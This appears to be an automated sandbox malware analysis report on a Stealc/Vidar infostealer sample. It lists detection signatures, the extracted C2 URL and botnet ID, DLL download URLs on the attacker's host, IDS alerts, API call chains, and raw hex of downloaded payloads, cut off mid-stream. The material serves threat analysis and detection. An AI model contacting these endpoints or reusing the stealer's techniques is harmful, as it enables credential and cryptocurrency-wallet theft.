Windows Analysis Report
ND2WP0Fip7.exe

Overview

General Information

Sample name: ND2WP0Fip7.exe
renamed because original name is a hash value
Original sample name: 7de1a4a7d819cc98fccdea05f9326c1a.exe
Analysis ID: 1532482
MD5: 7de1a4a7d819cc98fccdea05f9326c1a
SHA1: be8cbf5903dd27666d08c66114b084e5245d88b8
SHA256: c0cdd15f9913c6e88d7e124cbcba7ea981f12a856f473d0e96a94d8835d9ecf3
Tags: 32exetrojan
Infos:

Detection

Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found evasive API chain (may stop execution after checking locale)
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Searches for specific processes (likely to inject)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
One or more processes crash
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Name Description Attribution Blogpost URLs Link
Vidar Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection

barindex
Source: 2.2.ND2WP0Fip7.exe.400000.0.unpack Malware Configuration Extractor: StealC {"C2 url": "http://62.204.41.176/edd20096ecef326d.php", "Botnet": "default7_doz"}
Source: 2.2.ND2WP0Fip7.exe.400000.0.unpack Malware Configuration Extractor: Vidar {"C2 url": "http://62.204.41.176/edd20096ecef326d.php", "Botnet": "default7_doz"}
Source: http://62.204.41.176/db293a2c1b1c70c4/mozglue.dll Virustotal: Detection: 13% Perma Link
Source: http://62.204.41.176 Virustotal: Detection: 20% Perma Link
Source: http://62.204.41.176/db293a2c1b1c70c4/nss3.dll Virustotal: Detection: 13% Perma Link
Source: http://62.204.41.176/db293a2c1b1c70c4/softokn3.dll Virustotal: Detection: 13% Perma Link
Source: http://62.204.41.176/db293a2c1b1c70c4/vcruntime140.dll Virustotal: Detection: 15% Perma Link
Source: http://62.204.41.176/edd20096ecef326d.php; Virustotal: Detection: 19% Perma Link
Source: http://62.204.41.176/edd20096ecef326d.php Virustotal: Detection: 20% Perma Link
Source: http://62.204.41.176/edd20096ecef326d.phpO Virustotal: Detection: 19% Perma Link
Source: http://62.204.41.176/db293a2c1b1c70c4/sqlite3.dll Virustotal: Detection: 22% Perma Link
Source: http://62.204.41.176/db293a2c1b1c70c4/freebl3.dll Virustotal: Detection: 18% Perma Link
Source: http://62.204.41.176/db293a2c1b1c70c4/msvcp140.dll Virustotal: Detection: 13% Perma Link
Source: http://62.204.41.176/edd20096ecef326d.phpition: Virustotal: Detection: 19% Perma Link
Source: ND2WP0Fip7.exe Virustotal: Detection: 41% Perma Link
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: ND2WP0Fip7.exe Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_00409B60 CryptUnprotectData,LocalAlloc,memcpy,LocalFree, 2_2_00409B60
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_0040C820 memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcatA,lstrcatA,PK11_FreeSlot,lstrcatA, 2_2_0040C820
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_00407240 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree, 2_2_00407240
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_00409AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 2_2_00409AC0
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_00418EA0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA, 2_2_00418EA0
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_6C74A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util, 2_2_6C74A9A0
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_6C744440 PK11_PrivDecrypt, 2_2_6C744440
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_6C714420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free, 2_2_6C714420
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_6C7444C0 PK11_PubEncrypt, 2_2_6C7444C0
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_6C7925B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt, 2_2_6C7925B0
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_6C728670 PK11_ExportEncryptedPrivKeyInfo, 2_2_6C728670
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_6C74A650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext, 2_2_6C74A650
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_6C72E6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free, 2_2_6C72E6E0
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_6C76A730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError, 2_2_6C76A730
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_6C770180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util, 2_2_6C770180
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_6C7443B0 PK11_PubEncryptPKCS1,PR_SetError, 2_2_6C7443B0
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_6C767C00 SEC_PKCS12DecoderImportBags,PR_SetError,NSS_OptionGet,CERT_DestroyCertificate,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECOID_FindOID_Util,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,SECOID_GetAlgorithmTag_Util,SECITEM_CopyItem_Util,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,PK11_ImportPublicKey,SECOID_FindOID_Util, 2_2_6C767C00
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_6C727D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey, 2_2_6C727D60
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_6C76BD30 SEC_PKCS12IsEncryptionAllowed,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy, 2_2_6C76BD30
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_6C769EC0 SEC_PKCS12CreateUnencryptedSafe,PORT_ArenaMark_Util,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,SEC_PKCS7DestroyContentInfo, 2_2_6C769EC0
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_6C743FF0 PK11_PrivDecryptPKCS1, 2_2_6C743FF0
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_6C743850 PK11_Encrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError, 2_2_6C743850
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_6C749840 NSS_Get_SECKEY_EncryptedPrivateKeyInfoTemplate, 2_2_6C749840
Source: ND2WP0Fip7.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: ND2WP0Fip7.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: mozglue.pdbP source: ND2WP0Fip7.exe, 00000002.00000002.2097401273.000000006F8ED000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr
Source: Binary string: freebl3.pdb source: freebl3.dll.2.dr, freebl3[1].dll.2.dr
Source: Binary string: freebl3.pdbp source: freebl3.dll.2.dr, freebl3[1].dll.2.dr
Source: Binary string: nss3.pdb@ source: ND2WP0Fip7.exe, 00000002.00000002.2097197969.000000006C81F000.00000002.00000001.01000000.00000007.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr
Source: Binary string: C:\pbtflbwpofh14\Literally.pdb source: ND2WP0Fip7.exe
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.2.dr, softokn3.dll.2.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.2.dr, vcruntime140[1].dll.2.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.2.dr, msvcp140[1].dll.2.dr
Source: Binary string: nss3.pdb source: ND2WP0Fip7.exe, 00000002.00000002.2097197969.000000006C81F000.00000002.00000001.01000000.00000007.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr
Source: Binary string: mozglue.pdb source: ND2WP0Fip7.exe, 00000002.00000002.2097401273.000000006F8ED000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.2.dr, softokn3.dll.2.dr
Source: Binary string: C:\pbtflbwpofh14\Literally.pdb source: ND2WP0Fip7.exe
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 0_2_00EF546A FindFirstFileExW, 0_2_00EF546A
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 0_2_00EF5854 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 0_2_00EF5854
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 1_2_00EF546A FindFirstFileExW, 1_2_00EF546A
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 1_2_00EF5854 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 1_2_00EF5854
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 2_2_0040E430
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 2_2_004138B0
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 2_2_0040BE70
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 2_2_004016D0
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 2_2_0040DA80
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 2_2_0040F6B0
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA, 2_2_00414570
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 2_2_00414910
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 2_2_0040ED20
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 2_2_0040DE10
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 2_2_00413EA0
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior

Networking

barindex
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 62.204.41.176:80
Source: Network traffic Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.4:49730 -> 62.204.41.176:80
Source: Network traffic Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 62.204.41.176:80 -> 192.168.2.4:49730
Source: Network traffic Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.4:49730 -> 62.204.41.176:80
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 62.204.41.176:80 -> 192.168.2.4:49730
Source: Network traffic Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.4:49730 -> 62.204.41.176:80
Source: Malware configuration extractor URLs: http://62.204.41.176/edd20096ecef326d.php
Source: Malware configuration extractor URLs: http://62.204.41.176/edd20096ecef326d.php
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 13 Oct 2024 10:12:07 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 13 Oct 2024 10:12:11 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
